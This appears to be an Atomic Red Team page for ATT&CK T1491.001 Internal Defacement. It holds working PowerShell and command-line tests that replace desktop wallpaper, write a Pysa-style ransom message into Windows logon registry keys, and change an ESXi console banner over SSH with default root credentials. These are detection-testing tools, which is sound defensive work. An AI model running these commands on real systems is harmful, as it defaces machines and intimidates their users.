T1491.001

Description from ATT&CK

An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users, thus discrediting the integrity of the systems. This may take the form of modifications to internal websites or server login messages, or directly to user systems with the replacement of the desktop wallpaper.(Citation: Novetta Blockbuster)(Citation: Varonis) Disturbing or offensive images may be used as a part of Internal Defacement in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware)

Atomic Tests

Atomic Test #1 - Replace Desktop Wallpaper
Atomic Test #2 - Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message
Atomic Test #3 - ESXi - Change Welcome Message on Direct Console User Interface (DCUI)
Atomic Test #4 - Windows - Display a simulated ransom note via Notepad (non-destructive)

Atomic Test #1 - Replace Desktop Wallpaper

Downloads an image from a URL and sets it as the desktop wallpaper.

Supported Platforms: Windows

auto_generated_guid: 30558d53-9d76-41c4-9267-a7bd5184bed3

Inputs:

Name	Description	Type	Default Value
url_of_wallpaper	URL pointing to the image file you wish to set as wallpaper	url	https://redcanary.com/wp-content/uploads/Atomic-Red-Team-Logo.png
pointer_to_orginal_wallpaper	Full path to where a file containing the original wallpaper location will be saved	string	$env:TEMP\T1491.001-OrginalWallpaperLocation
wallpaper_location	Full path to where the downloaded wallpaper image will be saved	string	$env:TEMP\T1491.001-newWallpaper.png

Attack Commands: Run with `powershell`!

$url = "#{url_of_wallpaper}"
$imgLocation = "#{wallpaper_location}"
$orgWallpaper = (Get-ItemProperty -Path Registry::'HKEY_CURRENT_USER\Control Panel\Desktop\' -Name WallPaper).WallPaper
$orgWallpaper | Out-File -FilePath "#{pointer_to_orginal_wallpaper}"
$updateWallpapercode = @'
using System.Runtime.InteropServices;
namespace Win32{

    public class Wallpaper{
        [DllImport("user32.dll", CharSet=CharSet.Auto)]
         static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ;

         public static void SetWallpaper(string thePath){
            SystemParametersInfo(20,0,thePath,3);
        }
    }
}
'@
$wc = New-Object System.Net.WebClient
try{
    $wc.DownloadFile($url, $imgLocation)
    add-type $updateWallpapercode
    [Win32.Wallpaper]::SetWallpaper($imgLocation)
}
catch [System.Net.WebException]{
    Write-Host("Cannot download $url")
    add-type $updateWallpapercode
    [Win32.Wallpaper]::SetWallpaper($imgLocation)
}
finally{
    $wc.Dispose()
}

Cleanup Commands:

$updateWallpapercode = @'
using System.Runtime.InteropServices;
namespace Win32{

    public class Wallpaper{
        [DllImport("user32.dll", CharSet=CharSet.Auto)]
         static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ;

         public static void SetWallpaper(string thePath){
            SystemParametersInfo(20,0,thePath,3);
        }
    }
}
'@
if (Test-Path -Path #{pointer_to_orginal_wallpaper} -PathType Leaf) {
     $orgImg = Get-Content -Path "#{pointer_to_orginal_wallpaper}"
     add-type $updateWallpapercode
     [Win32.Wallpaper]::SetWallpaper($orgImg)
}
Remove-Item "#{pointer_to_orginal_wallpaper}" -ErrorAction Ignore
Remove-Item "#{wallpaper_location}" -ErrorAction Ignore

Atomic Test #2 - Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message

Display ransom message to users at system start-up by configuring registry keys HKLM\SOFTWARE\Micosoft\Windows\CurrentVersion\Policies\System\LegalNoticeCaption and HKLM\SOFTWARE\Micosoft\Windows\CurrentVersion\Policies\System\LegalNoticeText.

SynAck Ransomware, Grief Ransomware, Maze Ransomware, Pysa Ransomware, Spook Ransomware, DopplePaymer Ransomware, Reedemer Ransomware, Kangaroo Ransomware

Supported Platforms: Windows

auto_generated_guid: ffcbfaab-c9ff-470b-928c-f086b326089b

Inputs:

Name	Description	Type	Default Value
legal_notice_caption	Title of ransom message	string	PYSA
legal_notice_text	Body of ransom message	string	Hi Company, every byte on any types of your devices was encrypted. Don't try to use backups because it were encrypted too. To get all your data contact us:xxxx@onionmail.org

Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)

$orgLegalNoticeCaption = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeCaption).LegalNoticeCaption
$orgLegalNoticeText = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText).LegalNoticeText
$newLegalNoticeCaption = "#{legal_notice_caption}"
$newLegalNoticeText = "#{legal_notice_text}"
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeCaption -Value $newLegalNoticeCaption -Type String -Force
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText -Value $newLegalNoticeText -Type String -Force

Cleanup Commands:

Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeCaption -Value $orgLegalNoticeCaption -Type String -Force
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText -Value $orgLegalNoticeText -Type String -Force

Atomic Test #3 - ESXi - Change Welcome Message on Direct Console User Interface (DCUI)

Changes the ESXi welcome message to potentially display ransom information. Reference

Supported Platforms: Windows

auto_generated_guid: 30905f21-34f3-4504-8b4c-f7a5e314b810

Inputs:

Name	Description	Type	Default Value
vm_host	Specify the host name or IP of the ESXi server.	string	atomic.local
vm_user	Specify the privilege user account on the ESXi server.	string	root
vm_pass	Specify the privileged user's password.	string	password
plink_file	Path to Plink	path	PathToAtomicsFolder\..\ExternalPayloads\plink.exe

Attack Commands: Run with `command_prompt`!

echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "esxcli system welcomemsg set -m 'RANSOMWARE-NOTIFICATION'"

if (Test-Path "#{plink_file}") {exit 0} else {exit 1}

Get Prereq Commands:

New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"

Atomic Test #4 - Windows - Display a simulated ransom note via Notepad (non-destructive)

Creates a temporary ransom-note text file and opens it in Notepad to simulate ransomware "note display" behavior without making destructive changes. SAFE and non-destructive.

Supported Platforms: Windows

auto_generated_guid: 0eeb68ce-e64c-4420-8d53-ad5bdc6f86d5

Inputs:

Name	Description	Type	Default Value
note_filename	File name for the simulated ransom note	string	ART-T1491-ransom-note.txt
pid_filename	File name for storing Notepad PID	string	ART-T1491-notepad.pid
note_title	Title at the top of the ransom note	string	!!! READ_ME_NOW !!!
note_body	The body of the ransom note (plain text)	string	Your files are SAFE. This is a TEST note for detection validation
by bak3n3k0. No data has been encrypted. This simulation exercises
detections for:

notepad.exe launched with a ransom-themed text file
creation of a ransom-themed text file in %TEMP% NON-DESTRUCTIVE Atomic Red Team test.|

Attack Commands: Run with `powershell`!

$notePath = Join-Path $env:TEMP "#{note_filename}"
$pidPath  = Join-Path $env:TEMP "#{pid_filename}"

$Title = "#{note_title}"
$Body  = "#{note_body}"

$header  = $Title + "`r`n" + ('=' * $Title.Length) + "`r`n`r`n"
$content = $header + $Body

[System.IO.File]::WriteAllText($notePath, $content, [System.Text.Encoding]::UTF8)

$p = Start-Process notepad.exe -ArgumentList "`"$notePath`"" -PassThru
$p.Id | Out-File -FilePath $pidPath -Encoding ascii -Force

Cleanup Commands:

try {
  # 1. Kill all Notepad processes
  Get-Process notepad -ErrorAction SilentlyContinue |
    ForEach-Object {
      Stop-Process -Id $_.Id -Force -ErrorAction SilentlyContinue
    }

  # 2. Wait briefly for Windows to release file handles
  Start-Sleep -Seconds 1

  # 3. Force delete ransom note + PID file
  $notePath = Join-Path $env:TEMP "ART-T1491-ransom-note.txt"
  $pidPath  = Join-Path $env:TEMP "ART-T1491-notepad.pid"

  if (Test-Path $notePath) {
    Remove-Item $notePath -Force -ErrorAction Stop
  }
  if (Test-Path $pidPath) {
    Remove-Item $pidPath -Force -ErrorAction Stop
  }
}
catch {
  Write-Warning "Cleanup failed with error: $_"
}

where notepad

T1491.001

Atomic Tests

Atomic Test #1 - Replace Desktop Wallpaper

Inputs:

Attack Commands: Run with `powershell`!

Cleanup Commands:

Atomic Test #2 - Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message

Inputs:

Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)

Cleanup Commands:

Atomic Test #3 - ESXi - Change Welcome Message on Direct Console User Interface (DCUI)

Inputs:

Attack Commands: Run with `command_prompt`!

Dependencies: Run with `powershell`!

Description: Check if we have plink

Check Prereq Commands:

Get Prereq Commands:

Atomic Test #4 - Windows - Display a simulated ransom note via Notepad (non-destructive)

Inputs:

Attack Commands: Run with `powershell`!

Cleanup Commands:

Dependencies: Run with `command_prompt`!

Description: Notepad must be present on the system

Check Prereq Commands:

Get Prereq Commands:

On this page